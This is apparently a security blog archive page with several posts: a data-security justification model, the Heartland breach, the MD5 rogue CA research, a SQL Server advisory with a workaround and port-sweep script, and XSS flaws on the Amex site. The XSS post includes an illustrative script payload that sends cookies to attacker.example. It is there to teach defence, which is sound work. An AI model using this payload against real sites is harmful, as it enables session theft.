Securosis

Research

The Business Justification For Data Security

You’ve probably noticed that we’ve been a little quieter than usual here on the blog. After blasting out our series on Building a Web Application Security Program, we haven’t been putting up much original content. That’s because we’ve been working on one of our tougher projects over the past two weeks.

Adrian and I have both been involved with data (information-centric) security since long before we met. I was the first analyst to cover it over at Gartner, and Adrian spent many years as VP of Development and CTO in data security startups. A while back we started talking about models for justifying data security investments. Many of our clients struggle with the business case for data security, even though they know its intrinsic value. All too often they are asked to use ROI or other inappropriate models.

A few months ago one of our vendor clients asked if we were planning any research in this area. We initially thought they wanted yet another ROI model, but once we explained our positions they asked to sign up and license the content. Thus, in the very near future, we will be releasing a report (also distributed by SANS) on The Business Justification for Data Security. (For the record, I like the term information-centric better, but we have to acknowledge the reality that “data security” is more commonly used.) Normally we prefer to develop our content live on the blog, as with the application security series, but this was complex enough that we felt we needed to form a first draft of the complete model, then release it for public review.

Starting today, we’re going to release the core content of the report for public review as a series of posts. Rather than making you read the exhaustive report, we’re reformatting and condensing the content (the report itself will be available for free, as always, in the near future). Even after we release the PDF we’re open to input, and we intend to continuously revise the content over time.

The Business Justification Model

Today I’m just going to outline the core concepts and structure of the model. Our principal position is that you can’t fully quantify the value of information; it changes too often, and doesn’t always correlate to a measurable monetary amount. Sure, it’s theoretically possible, but practically speaking we assume the first person to fully and accurately quantify the value of information will win the Nobel Prize. Our model is built on the foundation that you quantify what you can, qualify the rest, and use a structured approach to combine those results into an overall business justification. We purposely designed this as a business justification model, not a risk/loss model. Yes, we talk about risk, valuation, and loss, but only in the context of justifying security investments. That’s very different from a full risk assessment/management model.

Our model follows four steps:

  • Data Valuation: In this step you quantify and qualify the value of the data, accounting for changing business context (when you can). It’s also where you rank the importance of data, so you know if you are investing in protecting the right things in the right order.
  • Risk Estimation: We provide a model to combine qualitative and quantitative risk estimates. Again, since this is a business justification model, we show you how to do this in a pragmatic way designed to meet this goal, rather than bogging you down in near-impossible endless assessment cycles. We provide a starting list of data-security specific risk categories to focus on.
  • Potential Loss Assessment: While it may seem counterintuitive, we break potential losses out from our risk estimate, since a single kind of loss may map to multiple risk categories. Again, you’ll see we combine the quantitative and qualitative. As with the risk categories, we also provide you with a starting list.
  • Positive Benefits Evaluation: Many data security investments also provide positive benefits beyond just reducing risk/losses. Reduced TCO and lower audit costs are just two examples.

After walking through these steps we show how to match the potential security investment to these assessments and evaluate the potential benefits, which is the core of the business justification. A summarized result might look like:

– Investing in DLP content discovery (data at rest scanning) will reduce our PCI-related audit costs by 15% by providing detailed, current reports of the location of all PCI data. This translates to $xx per annual audit.
– Last year we lost 43 laptops, 27 of which contained sensitive information. Laptop full drive encryption for all mobile workers effectively eliminates this risk. Since Y tool also integrates with our systems management console and tells us exactly which systems are encrypted, this reduces our risk of an unencrypted laptop slipping through the gaps by 90%.
– Our SOX auditor requires us to implement full monitoring of database administrators of financial applications within 2 fiscal quarters. We estimate this will cost us $X using native auditing, but the administrators will be able to modify the logs, and we will need Y man-hours per audit cycle to analyze logs and create the reports. Database Activity Monitoring costs $Y, which is more than native auditing, but by correlating the logs and providing the compliance reports it reduces the risk of a DBA modifying a log by Z%, and reduces our audit costs by 10%, which translates to a net potential gain of $ZZ.
– Installation of DLP reduces the chance of protected data being placed on a USB drive by 60%, the chance of it being emailed outside the organization by 80%, and the chance an employee will upload it to their personal webmail account by 70%.

We’ll be detailing more of the sections in the coming days, and releasing the full report early next month. But please let us know what you think of the overall structure. Also, if you want to take a look at a draft (and we know you), drop us a line… We’re really excited to get this out.
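To make the arithmetic behind a summary like the laptop example concrete, here is a minimal sketch in Python. The laptop counts and the 90% figure come from the example above; the per-incident cost, the tool cost, and every name in the code are hypothetical placeholders for illustration, not figures from the report.

    # Minimal illustration of the laptop-encryption arithmetic above.
    # Dollar figures are hypothetical placeholders, not numbers from the report.
    laptops_with_sensitive_data = 27       # of the 43 laptops lost last year
    coverage_gap_reduction = 0.90          # encryption tied to the management console
    cost_per_exposed_laptop = 25_000       # hypothetical expected cost of one exposure
    encryption_cost = 100_000              # hypothetical annual cost of the tool

    exposure_before = laptops_with_sensitive_data * cost_per_exposed_laptop
    exposure_after = exposure_before * (1 - coverage_gap_reduction)
    loss_reduction = exposure_before - exposure_after

    print(f"Expected annual loss reduction: ${loss_reduction:,.0f}")
    print(f"Net benefit after tool cost:    ${loss_reduction - encryption_cost:,.0f}")

The same quantify-what-you-can approach applies to the other summaries; the qualitative pieces still have to be argued in prose.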


Heartland Payment Systems Attempts To Hide Largest Data Breach In History Behind Inauguration

Brian Krebs of the Washington Post dropped me a line this morning on a new article he posted. Heartland Payment Systems, a credit card processor, announced today, January 20th, that up to 100 million credit cards may have been exposed in what is likely the largest data breach in history. From Brian’s article:

Baldwin said 40 percent of transactions the company processes are from small to mid-sized restaurants across the country. He declined to name any well-known establishments or retail clients that may have been affected by the breach. Heartland called U.S. Secret Service and hired two breach forensics teams to investigate. But Baldwin said it wasn’t until last week that investigators uncovered the source of the breach: A piece of malicious software planted on the company’s payment processing network that recorded payment card data as it was being sent for processing to Heartland by thousands of the company’s retail clients. … “The transactional data crossing our platform, in terms of magnitude… is about 100 million transactions a month,” Baldwin said. “At this point, though, we don’t know the magnitude of what was grabbed.”

I want you to roll that number around on your tongue a little bit. 100 million transactions per month. I suppose I’d try to hide behind one of the most historic events in the last 50 years if I were in their shoes.

“Due to legal reviews, discussions with some of the players involved, we couldn’t get it together and signed off on until today,” Baldwin said. “We considered holding back another day, but felt in the interests of transparency we wanted to get this information out to cardholders as soon as possible, recognizing of course that this is not an ideal day from the perspective of visibility.”

In a short IM conversation Brian mentioned he called the Secret Service today for a comment, and was informed they were a little busy. We’ll talk more once we know more details, but this is becoming a more common attack vector, and by our estimates it is the most common vector in massive breaches. TJX, Hannaford, and CardSystems, three of the largest previous breaches, all involved installing malicious software on internal networks to sniff cardholder data and export it. This was also another case that was discovered by initially detecting fraud in the system and tracing it back to the origin, rather than through the company’s own internal security controls.


The Network Security Podcast, Episode 134

It’s just Martin and myself on the podcast this week. Originally Martin sent out a bunch of stories and we figured, knowing our verbosity, that we would only get through about 3. But totally against our normal natures we managed to roll through them with nary a non-sequitur. I suppose people really can change. We think we’ve finally figured out our end of year audio problems, but please let me know if anything sounds off to you.

Network Security Podcast, Episode 134, January 13, 2009
Time: 32:27

Show Notes:

  • CWE/SANS Top 25 most dangerous programming errors
  • SANS: How to Suck at Information Security
  • The Air Force’s rules of engagement for blogging – This is one that’s worth sending to your marketing/PR departments
  • Phishing scams for money? Don’t bet on it.
  • The High Stakes of Compliance
  • Watchdogs bite IRS for continued security lapses

Tonight’s music: Details of the war by clap your hands say yeah


There Are No Trusted Sites: Paris Hilton Edition

While not on the scale of Amex or BusinessWeek, I just find this one amusing. Paris Hilton’s official website was hacked and is serving up a trojan (the malware kind, not what you’d expect from her*). From Network World:

The hack was discovered by security vendor ScanSafe, which said that Parishilton.com (note: this site is not safe to visit as of press time) had apparently been compromised since Friday. Visitors to the site are presented with a pop-up window urging them to download software in order to enhance their viewing of the site. Whether they click “yes” or “no” on this window, the site then tries to download a malicious program, known as Trojan-Spy.Zbot.YETH, from another Web site.

The best part? Only 12 of 37 tested AV vendors catch the trojan. All of you who give me crap for hammering on AV can go away now.

*Sorry, couldn’t help myself there.


Macworld Coverage

Macworld Expo may no longer be good enough for Apple, but it’s still one of my conference highlights of the year. I’ll be out there today through Thursday while Adrian manages the fort in Phoenix (I’ve managed to convince him that cleaning the cat litter while my wife is at work is a formal job responsibility; please don’t tell him that’s illegal and stuff). Most of my writing this week will be over at TidBITS, but I’ll pop some of my informal thoughts (and anything security related) over here at Securosis and on Twitter. And if any of you are over at the Expo, drop me a line and let’s try to meet up.

For the record, I don’t expect any earth-shattering new announcements this week, but some nice incremental upgrades. To be honest, I’d rather have better stability and functionality with what I already own than some new device I’ll get in trouble for buying.

P.S. Dear Apple, if you do announce anything insanely new and cool, please make it small enough to fit in my carry-on luggage. That is all.


What Regular Users Need To Know About The SSL/Root Certificate Authority Exploit

Update: Verisign already closed the hole.

This morning (in the US; afternoon in Europe), a team of security researchers revealed that they are in possession of a forged Certificate Authority digital certificate that pretty much breaks the whole idea of a trusted website. It allows them to create a fake SSL certificate that your browser will accept for any website. The short summary is that this isn’t something you need to worry about as an individual, there isn’t anything you can do about it, and the odds are extremely high that the hole will be closed before any bad guys can take advantage of it.

Now for some details and analysis, based on the information they’ve published. Before digging in, if you know what an MD5 hash collision is you really don’t need to be reading this post and should go look at the original research yourself. Seriously, we’re not half as smart as the guys who figured this out. Hell, we probably aren’t smart enough to scrape poop off their shoes (okay, maybe Adrian is, since he has an engineering degree, but all I have is a history one with a smidgen of molecular bio).

This seriously impressive research was released today at the Chaos Communication Congress. The team, consisting of Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, and Benne de Weger, took advantage of known flaws in the MD5 hash algorithm and combined them with new research (and an array of 200 Sony PlayStation 3s) to create a forged certificate all web browsers would trust. Here are the important things you need to know (and seriously, read their paper):

  • All digital certificates use a cryptographic technique known as a hash function as part of the signature that validates the certificate.
  • Most certificates just ‘prove’ a website is who it says it is. Some special certificates are used to sign those regular certificates and prove they are valid (these belong to a Certificate Authority, or CA). There is a small group of CAs which are trusted by web browsers, and any certificate they issue is in turn trusted. That’s why when you go to your bank, the little lock icon appears in your browser and you don’t get any alerts. Other CAs can issue certificates (heck, we do it), but they aren’t “trusted”, and your browser will alert you that something fishy might be going on.
  • One of the algorithms used for this hash function is called MD5, and it’s been broken since 2004. The role of a hash function is to take a block of information, then produce a shorter string of characters (bits) that identifies the original block. We use this to prove that the original wasn’t modified: if we have the text, and we have the MD5 result, we can recalculate the MD5 from the original and it should produce exactly the same result, which must match the hash we got. If someone changes even a single character in the original, the hash we calculate will be completely different from the one we got to check against.
  • Without going into detail, we rely on these hash functions in digital certificates to prove that the text we read in them (particularly the website address and company name) hasn’t been changed and can be trusted. That way a bad guy can’t take a good certificate and just change a few fields to say whatever they want.
  • But MD5 has some problems that we’ve known about for a while, and it’s possible to create “collisions”. A collision is when two sources have the exact same MD5 hash. All hash algorithms can have collisions (if they were really 1:1, the hash would be as long as the original and have no purpose), but it’s the job of cryptographers to make collisions very rare, and ideally make it effectively impossible to force one. If a bad guy could force an MD5 hash collision between a real cert and their fake, we would have no way to tell the real from the forgery.
  • Research from 2004 and then 2007 showed this is possible with MD5, and everyone was advised to stop using MD5 as a result. Even with that research, forging an MD5-based digital certificate for a CA had never been done, and was considered very complex, if not impossible. Until now.
  • The research team developed new techniques and actually forged a certificate for RapidSSL, which is owned by Verisign. They took advantage of a series of mistakes by RapidSSL/Verisign and can now fake a trusted certificate for any website on the planet, by signing it with their rogue CA certificate (which carries an assurance of trustworthiness from RapidSSL, and thus indirectly from Verisign).
  • RapidSSL is one of six root CAs the research team identified as still using MD5. RapidSSL also uses an automated issuing system with predictable serial numbers and timing, two fields the researchers needed to control for their method to work. Without these three elements (MD5, serial number, and timing) they wouldn’t have been able to create their certificate.
  • They managed to purchase a legitimate certificate from RapidSSL/Verisign with exactly the information they needed, then used its contents to create their own fake, trusted Certificate Authority certificate, which they can then use to create forged certificates for any website. They used some serious math, new techniques, and a special array of 200 Sony PS3s to create their rogue certificate.
  • Since browsers will trust any certificate signed by a trusted CA, this means the researchers can create fake certificates for any site, no matter who originally issued the certificate for that site.
  • But don’t worry: the researchers took a series of safety precautions, one being that they set their certificate to expire in 2004, meaning that unless you set the clock back on your computer, you’ll still get a security alert for any certificate they sign (and they are keeping it secret in the first place).

All the Certificate Authorities and web browser companies are
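To make the hash and collision ideas above concrete, here is a minimal sketch using Python’s standard hashlib. This is our illustration, not the researchers’ code; the certificate fields are hypothetical. The point is that a signature covers only the hash of a certificate, so any two different inputs with the same hash share the same signature.

    # Illustration only: MD5 hashing, and why a collision breaks the trust model.
    import hashlib

    cert_fields_a = b"CN=www.example-bank.com, O=Example Bank"   # hypothetical certificate contents
    cert_fields_b = b"CN=www.example-bank.com, O=Example Bank."  # one character changed

    print(hashlib.md5(cert_fields_a).hexdigest())
    print(hashlib.md5(cert_fields_b).hexdigest())  # changing one byte changes the entire digest

    # The researchers went the other direction: they constructed two *different*
    # certificate bodies with the *same* MD5 digest, so the CA's signature over the
    # harmless one they purchased is equally valid for their rogue CA certificate.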



SQL Server Zero Day: Security Advisory (961040)

The Microsoft Security Advisory (961040) for SQL Server was posted on the 22nd of December. Microsoft has done a commendable job and provided a lot of information on this page, with a cross-reference to the CVE number (CVE-2008-4270) so you can find more details if you need them. Like any stored procedure that provides remote code execution, this one is dangerous and a target for attackers. You want to patch as soon as Microsoft releases a patch.

Microsoft states that “… MSDE 2000 or SQL Server 2005 Express are at risk of remote attack if they have modified the default installation to accept remote connections, if they allow untrusted users access to MSDE 2000 or SQL Server 2005 Express …”. But I rate the risk higher than what they are saying, for the following reasons: First, MSDE 2000 and SQL Server Express 2005 are often bundled/embedded into applications, so their presence is not immediately apparent. There may be copies around that most IT staff are not fully aware of, and these applications may be delivered with open permissions because the developer of the application was not concerned with these functions. Second, replication is an administrative function. sp_replwritetovarbin, along with other stored procedures like sp_resyncexecutesql and sp_resyncexecute, runs as DBO (Database Owner), so if it is compromised it exposes elevated permissions as well as function. Finally, as MSDE 2000 and SQL Server Express 2005 get used by web developers who run the database on the same machine with the same OS/DBA credentials, your server could be completely compromised through this one flaw.

So follow their advice and run the command: “use master deny execute on sp_replwritetovarbin to public”

A couple more recommendations: assuming you are a DBA (which is a fair assumption if you are running the suggested workaround), check master.dbo.sysprotects and master.dbo.sysobjects for public permissions in general. Even if you are patched for this specific vulnerability, or if you are running an unaffected version of the database, you should have this procedure locked down, otherwise you remain vulnerable. Over and above patching the known servers, if you have a scanning and discovery tool, run a scan across your network for the default SQL Server port to see if there are other database engines. That should spotlight the majority of undocumented databases.
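If you don’t already have a scanning and discovery tool, the sweep suggested above can be approximated with a short script. This is a minimal sketch in Python that checks the default SQL Server TCP port (1433) on a hypothetical subnet you are authorized to scan; MSDE/Express instances using dynamic ports or with networking disabled won’t show up this way.

    # Minimal sweep for hosts listening on the default SQL Server port (TCP 1433).
    # The subnet below is a hypothetical example; only scan networks you own.
    import socket
    import ipaddress

    SQL_SERVER_PORT = 1433

    def has_open_sql_port(host: str, timeout: float = 0.5) -> bool:
        try:
            with socket.create_connection((host, SQL_SERVER_PORT), timeout=timeout):
                return True
        except OSError:
            return False

    for ip in ipaddress.ip_network("10.0.0.0/24").hosts():
        if has_open_sql_port(str(ip)):
            print(f"{ip} is listening on {SQL_SERVER_PORT} - check whether it is documented")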


There Are No Trusted Sites: AMEX Edition

Remember our first post that there are no trusted sites? Followed by our second one? Now I suppose it’s time to start naming names in the post titles, since this seems to be a popular trend. American Express is our latest winner. From Dark Reading:

Researchers have been reporting vulnerabilities on the Amex site since April, when the first of several cross-site scripting (XSS) flaws was reported. However, researcher Russell McRee caused a stir again just a week ago when he reported newly discovered XSS vulnerabilities on the Amex site. The vulnerability, which is caused by an input validation deficiency in a GET request, can be exploited to harvest session cookies and inject iFrames, exposing Amex site users to a variety of attacks, including identity theft, researchers say. McRee was tipped off to the problem when the Amex site prompted him to shorten his password – an unusual request in today’s security environment, where strong passwords are usually encouraged. … McRee says American Express did not respond to his warnings about the vulnerability. However, in a report issued by The Register on Friday, at least two researchers said they found evidence that American Express had attempted to fix the flaw – and failed. “They did not address the problem,” says Joshua Abraham, a Web security consultant for Rapid7, a security research firm. “They addressed an instance of the problem. You want to look at the whole application and say, ‘Where could similar issues exist?’”

No, we don’t intend to post every one of these we hear about, but some of the bigger ones serve as nice reminders that there really isn’t any such thing as a “safe” website.
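For readers who haven’t run into this class of flaw up close, here is a minimal, hypothetical sketch in Python (in no way taken from the Amex site) of how a GET parameter reflected into a page without validation or encoding becomes an XSS hole, and what the output-encoding fix looks like.

    # Hypothetical illustration of a reflected XSS flaw and its fix.
    import html

    def render_results(query_param: str, encode: bool) -> str:
        # With encode=False the raw request parameter lands in the HTML, so a
        # crafted link can run script in the victim's browser and steal cookies.
        value = html.escape(query_param) if encode else query_param
        return "<h1>Results for " + value + "</h1>"

    payload = "<script>document.location='http://attacker.example/?c='+document.cookie</script>"
    print(render_results(payload, encode=False))  # vulnerable: script would execute
    print(render_results(payload, encode=True))   # safe: payload rendered as inert text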


MIT Students Now Helping MBTA – Like They Always Should Have

Remember our guest post from Jesse Krembs on the MIT students put under a gag order during DefCon this year for hacking the rail system? And I quote:

Please grow up; in the connected world there are very few ogres in caves any more, and they don’t let you ride their trains. The difference between black hats and white hats is a line, and it’s a gray one. But occasionally it gets a little contrast. When you treat the person or organization with a security problem like a victim or an enemy, then you’re the bad guy. You’re basically fucking them over, sometimes hard, sometimes gently, but it’s still a screw job. When you treat them like a partner, then everyone wins. Sure, sometimes they don’t want partners, and sometimes you have to go public because they put the rest of the world at risk, but you don’t know that until you try talking to them. Finally I should note that in the end the only people winning in this case are the lawyers; the kids won’t win in the way they want, nor will the MBTA. The lawyers, on the other hand, always get paid.

Looks like Superman just spun the Earth backwards and turned back time (sort of):

The announcement brings to a close a high profile case that pitted the rights of security researchers to freely discuss their findings against the concerns of one of the country’s largest transit systems, which worried that this type of information could lead to widespread ticket fraud. “I’m really glad to have it behind me. I think this is really what should have happened from the start,” said Zack Anderson, one of the students sued by the MBTA. … The settlement ends the matter in an amicable way. “For professional reasons and for public interest reasons, the students wanted to help the MBTA,” said Jennifer Granick, a lawyer with the Electronic Frontier Foundation who represents the students. The case against the three was finally settled on Oct. 7, but this was not publicly announced until Monday, because it took two months for all parties to schedule a public announcement of the settlement, Granick said. The researchers met with MBTA technical staff on Oct. 21 to discuss their findings and are working to improve the transit authority’s fare collection system, she added.

And all is good in the world again.


Totally Transparent Research is the embodiment of how we work at Securosis. It’s our core operating philosophy, our research policy, and a specific process. We initially developed it to help maintain objectivity while producing licensed research, but its benefits extend to all aspects of our business.

Going beyond Open Source Research, and a far cry from the traditional syndicated research model, we think it’s the best way to produce independent, objective, quality research.

Here’s how it works:

  • Content is developed ‘live’ on the blog. Primary research is generally released in pieces, as a series of posts, so we can digest and integrate feedback, making the end results much stronger than traditional “ivory tower” research.
  • Comments are enabled for posts. All comments are kept except for spam, personal insults of a clearly inflammatory nature, and completely off-topic content that distracts from the discussion. We welcome comments critical of the work, even if somewhat insulting to the authors. Really.
  • Anyone can comment, and no registration is required. Vendors or consultants with a relevant product or offering must properly identify themselves. While their comments won’t be deleted, the writer/moderator will “call out”, identify, and possibly ridicule vendors who fail to do so.
  • Vendors considering licensing the content are welcome to provide feedback, but it must be posted in the comments - just like everyone else. There is no back channel influence on the research findings or posts.
    Analysts must reply to comments and defend the research position, or agree to modify the content.
  • At the end of the post series, the analyst compiles the posts into a paper, presentation, or other delivery vehicle. Public comments/input factors into the research, where appropriate.
  • If the research is distributed as a paper, significant commenters/contributors are acknowledged in the opening of the report. If they did not post their real names, handles used for comments are listed. Commenters do not retain any rights to the report, but their contributions will be recognized.
  • All primary research will be released under a Creative Commons license. The current license is Non-Commercial, Attribution. The analyst, at their discretion, may add a Derivative Works or Share Alike condition.
  • Securosis primary research does not discuss specific vendors or specific products/offerings, unless used to provide context, contrast or to make a point (which is very very rare).
    Although quotes from published primary research (and published primary research only) may be used in press releases, said quotes may never mention a specific vendor, even if the vendor is mentioned in the source report. Securosis must approve any quote to appear in any vendor marketing collateral.
  • Final primary research will be posted on the blog with open comments.
  • Research will be updated periodically to reflect market realities, based on the discretion of the primary analyst. Updated research will be dated and given a version number.
    For research that cannot be developed using this model, such as complex principles or models that are unsuited for a series of blog posts, the content will be chunked up and posted at or before release of the paper to solicit public feedback, and provide an open venue for comments and criticisms.
  • In rare cases Securosis may write papers outside of the primary research agenda, but only if the end result can be non-biased and valuable to the user community to supplement industry-wide efforts or advances. A “Radically Transparent Research” process will be followed in developing these papers, where absolutely all materials are public at all stages of development, including communications (email, call notes).
    Only the free primary research released on our site can be licensed. We will not accept licensing fees on research we charge users to access.
  • All licensed research will be clearly labeled with the licensees. No licensed research will be released without indicating the sources of licensing fees. Again, there will be no back channel influence. We’re open and transparent about our revenue sources.

In essence, we develop all of our research out in the open, and not only seek public comments, but keep those comments indefinitely as a record of the research creation process. If you believe we are biased or not doing our homework, you can call us out on it and it will be there in the record. Our philosophy involves cracking open the research process, and using our readers to eliminate bias and enhance the quality of the work.

On the back end, here’s how we handle this approach with licensees:

  • Licensees may propose paper topics. The topic may be accepted if it is consistent with the Securosis research agenda and goals, but only if it can be covered without bias and will be valuable to the end user community.
  • Analysts produce research according to their own research agendas, and may offer licensing under the same objectivity requirements.
  • The potential licensee will be provided an outline of our research positions and the potential research product so they can determine if it is likely to meet their objectives.
  • Once the licensee agrees, development of the primary research content begins, following the Totally Transparent Research process as outlined above. At this point, there is no money exchanged.
  • Upon completion of the paper, the licensee will receive a release candidate to determine whether the final result still meets their needs.
  • If the content does not meet their needs, the licensee is not required to pay, and the research will be released without licensing or with alternate licensees.
  • Licensees may host and reuse the content for the length of the license (typically one year). This includes placing the content behind a registration process, posting on white paper networks, or translating it into other languages. The research will always be hosted at Securosis for free without registration.

Here is the language we currently place in our research project agreements:

Content will be created independently of LICENSEE with no obligations for payment. Once content is complete, LICENSEE will have a 3 day review period to determine if the content meets corporate objectives. If the content is unsuitable, LICENSEE will not be obligated for any payment and Securosis is free to distribute the whitepaper without branding or with alternate licensees, and will not complete any associated webcasts for the declining LICENSEE. Content licensing, webcasts and payment are contingent on the content being acceptable to LICENSEE. This maintains objectivity while limiting the risk to LICENSEE. Securosis maintains all rights to the content and to include Securosis branding in addition to any licensee branding.

Even this process itself is open to criticism. If you have questions or comments, you can email us or comment on the blog.